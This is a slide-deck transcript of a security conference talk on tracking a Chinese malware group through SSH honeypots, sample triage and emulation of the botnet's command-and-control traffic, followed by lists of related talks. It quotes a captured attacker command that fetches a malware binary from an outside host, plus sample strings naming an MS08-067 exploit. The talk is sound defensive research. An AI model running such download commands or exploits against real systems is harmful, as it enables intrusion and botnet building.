SlideShare una empresa de Scribd logo

BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns on the Cheap

A
Andrew Morris
Datos y análisis
1 de 59
Descargar para leer sin conexión
Ballin on a Budget Tracking Chinese threat actors on the cheap Andrew Morris
a/s/l? • Andrew Morris • Security Engineer, iSEC Partners • Twitter - @Andrew___Morris • Email - andrew@morris.guru
Overview • I’m going to tell you how I tracked a group of threat actors • I’m going to show you how you can too
Part 1: background
wtf is threat intel • Gathering intelligence on your adversaries (or bad guys in general) • Predicting and preventing attacks before they happen
Lots of companies do it
We can too!
What we can’t do • As ballers on budgets, we don’t have access to a lot of good data • I’m assuming we do not have access to IR artifacts from targeted compromises • So we’re going to focus on mass attacks targeting the entire internet • We’re only going to track dumb groups with poor opsec • Today we’ll focus on a group that spreads malware via crappy SSH passwords
How do you threat intelligence? • Set up a network of vulnerable machines exposed to the internet • Monitor them for attacks • Aggregate data • Locate, secure, and analyze artifacts • Locate key adversary infrastructure • ?????? • Profit!
How to ball, on a budget • Setting up infrastructure - honeypots • Monitoring attacks - management interface, log review • Locating a group of attackers - Scraping their web servers • Figuring out who they are - Analyzing capabilities, correlating data, securing artifacts • Tracking their targets - Get creative! • Implementing defenses - Firewall rules, indicators, TTP write-ups
Quick Malware Primer • Most malware uses the conventional C2 (command and control) model • Lots of botnets are used to perform DDOS (distributed denial of service) attacks
Our targets • Guess passwords via SSH • uname -a • wget malware.run
Step 2: Setting up Infrastructure
Honeypots!
What is a honeypot? • An intentionally vulnerable server or application that serves no business purpose • It’s only purpose is to attract attention of attackers
Step 1 - Cheap Hosting • CloudAtCost • Pros: CHEAP - $35 dollar one time fee for a machine FOREVER • Cons: Crappy uptime, slow, unreliable
Step 1.1 - OPSEC • Don’t reuse passwords • Don’t put any data on the machine • Don’t put anything personally identifiable on the machine • Assume the machine will be compromised at any moment
Step 2 - Management • ThreatStream released an awesome open source centralized honeypot monitor called MHN (Managed Honey Network) • Looks like this
Kippo • SSH Honeypot • Can record attacker sessions • Can grab artifacts attackers attempt to download with wget • Configure certain usernames and passwords
Let the attacks begin!
Data Analytics: Ballin on a Budget style # grep 'login attempt' * | cut -d' ' -f9 | sort | uniq -c | sort -n | tail -n25 | tac Top 25 passwords being used against your infrastructure?
Data Analytics: Ballin on a Budget style (cont’d) # grep SSHService * | cut -d']' -f1 | cut -d',' -f3 | sort | uniq -c | sort -n | tail -n25 | tac Top 25 attacker IP addresses
Tracker Real-time Alerting analytics: Ballin on a budget style https://github.com/andrew-morris/tracker/
Quick recap • We learned what threat intel is • We learned how to set up and operate infrastructure
Part 3: Locating the Group
Successful Logins with Kippo
root@mgmt.muXXXXXXXXX.com:~# wget -O /etc/run_second=$q http://60.173.X.X:8080/14.17 --2014-08-07 10:25:11-- http:///etc/run_second=$q Connecting to None:80... connected. HTTP request sent, awaiting response... Credit to MalwareMustDie
• Do some internet recon to see if anyone’s seen the binaries before • Search Google, VirusTotal, Malwr, etc for the md5 • That being said… this still gets me giddy
what if I suck at reversing tho
It’s all good!
Malware Analysis: Ballin on a budget style • Use malwr.com and virustotal.com
Part 4: CHUILANG aka a group I’ve been tracking
Who I’m working on • I was getting hit a lot by a particular group • I secured some of their malware samples
something something China
1.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit 14.17: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped 183.60: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped 445.rar: RAR archive data, v1d, os: Win32 5900.rar: RAR archive data, v1d, os: Win32 Freebsd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, for FreeBSD 8.4, not stripped L24_36000: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped SSHSecureShellClient-3[1][1].2.9.zip: Zip archive data, at least v2.0 to extract elf: directory elf.tar.gz: POSIX tar archive (GNU) putty.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit tcpwra: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped xpoer: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped xsyer: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped ºì³¾Íø°²445Éø͸¹¤¾ß°ü.rar: RAR archive data, v1d, os: Win32 命令提示符.exe 入侵前需要 启的服务.bat FTP下载命令.txt SMB Connect OK! Make SMB Connection error:%d MS08-067 Exploit for CN by EMM@ph4nt0m.org %sIPC$ pipebrowser EMM! B041
Reversing • Reversing this malware is a talk in itself • I suck at reversing so don’t listen to anything I tell you • I’ll post the IDB files on my github soon • Sometimes you don’t have to reverse anything
Analysis Dropped a couple other binaries Added itself to startup The usual Contained DDOS capability Function names like “SYNFLOOD”, “UDPFLOOD”, etc
Traffic I see…. IP addresses?
Lots of IPs
# geo [+] IP Address: 202.102.199.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 218.104.78.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 211.138.180.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 211.91.88.129 Country: China Region: 22 City: Beijing Coordinates: 39.92890,116.38830 [+] IP Address: 202.38.64.1 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 58.242.2.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.200.101 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.213.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.192.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 61.132.163.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 andrew$ geo 8.8.8.8 [+] IP Address: 8.8.8.8 Country: United States Region: CA City: Mountain View Coordinates: 37.38600,-122.08380 Geographical Correlation Engine: Ballin on a budget style
Who are these IPs? CartoDB is AWESOME
What are they? • DNS servers • Backbone routers • Etc
C2 traffic • Those IPs were their DDOS targets • They were blasting instructions from the C2 • Let’s build our own client!
Step 1: Spend hours staring at Wireshark Step 2: Try not to kill yourself
What the code looks like https://github.com/andrew-morris/chuilang2014_emulate/
What the code does
Honeypot > Identifying threats > Tracking targets
Recap! • We’ve captured malware • Analyzed it to identify capabilities • Reversed the protocol to identify the groups targets in real time
Closing Notes
End result? • Real-time tracking of the group’s targets, as they target them • Malware artifacts • C2 IP addresses to block from your network
Summary of the Group • Based in China • Not advanced • Use easily guessable credentials and 6 year old exploits (MS08_067) • Goals: Build botnet to DDOS people • Somewhat smart about targeting
Closing Notes The majority of this intel was gathered from one piece of malware from one campaign There are lots of these campaigns and attacks occurring at any moment You just need to find them
TO DO! • Track more of these C2s • Figure out how to identify other compromised clients • Setup automated notification system to alert admins that they will be targeted • Setup live-updating map of their targets
• Threat intelligence isn’t that hard • It’s easy to ball on a budget • Get out there and track some targets! • Don’t forget to share your info!
Credit • MalwareMustDie - @malwaremustdie • Cartodb - cartodb.com • Malwr - malwr.com • VirusTotal - virustotal.com • CloudAtCost - cloudatcost.com • ThreatStream MHN - github.com/threatstream/mhn • Rob Blody (gir489) for helping me reverse some malware samples • Nat Puffer for getting me interested in this stuff
Thank you! Andrew Morris @Andrew___Morris andrew@morris.guru

Recomendados

Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsAndrew Morris
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
Weekend Malware Research 2012
Weekend Malware Research 2012Weekend Malware Research 2012
Weekend Malware Research 2012Andrew Morris
 
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...Andrew Morris
 
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Andrew Morris
 
The Background Noise of the Internet
The Background Noise of the InternetThe Background Noise of the Internet
The Background Noise of the InternetAndrew Morris
 
Shmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHShmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHAndrew Morris
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoJohn Bambenek
 

Recomendados

Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsAndrew Morris
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
Weekend Malware Research 2012
Weekend Malware Research 2012Weekend Malware Research 2012
Weekend Malware Research 2012Andrew Morris
 
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...
Identifying and Correlating Internet-wide Scan Traffic to Newsworthy Security...Andrew Morris
 
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Andrew Morris
 
The Background Noise of the Internet
The Background Noise of the InternetThe Background Noise of the Internet
The Background Noise of the InternetAndrew Morris
 
Shmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHShmoocon Epilogue 2013 - Ruining security models with SSH
Shmoocon Epilogue 2013 - Ruining security models with SSHAndrew Morris
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoJohn Bambenek
 
ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleJohn Bambenek
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksEC-Council
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteEC-Council
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionGreg Foss
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston HeckerEC-Council
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...EC-Council
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?Zoltan Balazs
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesJohn Bambenek
 
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...BlueHat Security Conference
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkJack Shaffer
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptxChi En (Ashley) Shen
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Lastline, Inc.
 
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat Security Conference
 
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksJohn Bambenek
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCanSecWest
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksGreg Foss
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?Aaron Lancaster
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...Andrew Morris
 

Más contenido relacionado

La actualidad más candente

ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleJohn Bambenek
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksEC-Council
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteEC-Council
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionGreg Foss
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston HeckerEC-Council
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...EC-Council
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?Zoltan Balazs
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesJohn Bambenek
 
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...BlueHat Security Conference
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkJack Shaffer
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptxChi En (Ashley) Shen
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Lastline, Inc.
 
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat Security Conference
 
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksJohn Bambenek
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCanSecWest
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksGreg Foss
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?Aaron Lancaster
 

La actualidad más candente (20)

ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at Scale
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael Banks
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement Detection
 
Security by Weston Hecker
Security by Weston HeckerSecurity by Weston Hecker
Security by Weston Hecker
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing Felonies
 
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
 
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015 Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
Most Ransomware Isn’t As Complex As You Might Think – Black Hat 2015
 
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
BlueHat v17 || Wannacrypt + Smbv1.0 Vulnerability = One of the Most Damaging ...
 
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime NetworksTHOTCON 0x6: Going Kinetic on Electronic Crime Networks
THOTCON 0x6: Going Kinetic on Electronic Crime Networks
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg dayCSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?Why are you still getting CryptoLocker?
Why are you still getting CryptoLocker?
 

Similar a BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns on the Cheap

ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...Andrew Morris
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Stephan Chenette
 
CH1- Introduction to malware analysis-v2.pdf
CH1- Introduction to malware analysis-v2.pdfCH1- Introduction to malware analysis-v2.pdf
CH1- Introduction to malware analysis-v2.pdfWajdiElhamzi3
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzDeepanshu Gajbhiye
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion DetectionAPNIC
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingAndrew McNicol
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault
 
Web hacking 1.0
Web hacking 1.0Web hacking 1.0
Web hacking 1.0Q Fadlan
 
Information about malwares and Attacks.pptx
Information about malwares and Attacks.pptxInformation about malwares and Attacks.pptx
Information about malwares and Attacks.pptxmalikmuzammil2326
 
FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUPWill Pearce
 
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnovDetecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnovEric Vanderburg
 
Advanced Persistent Threats
Advanced Persistent ThreatsAdvanced Persistent Threats
Advanced Persistent ThreatsESET
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointAndrew McNicol
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionNeel Pathak
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationSatria Ady Pradana
 

Similar a BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns on the Cheap (20)

Malware analysis
Malware analysisMalware analysis
Malware analysis
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
CH1- Introduction to malware analysis-v2.pdf
CH1- Introduction to malware analysis-v2.pdfCH1- Introduction to malware analysis-v2.pdf
CH1- Introduction to malware analysis-v2.pdf
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
 
Phd final
Phd finalPhd final
Phd final
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
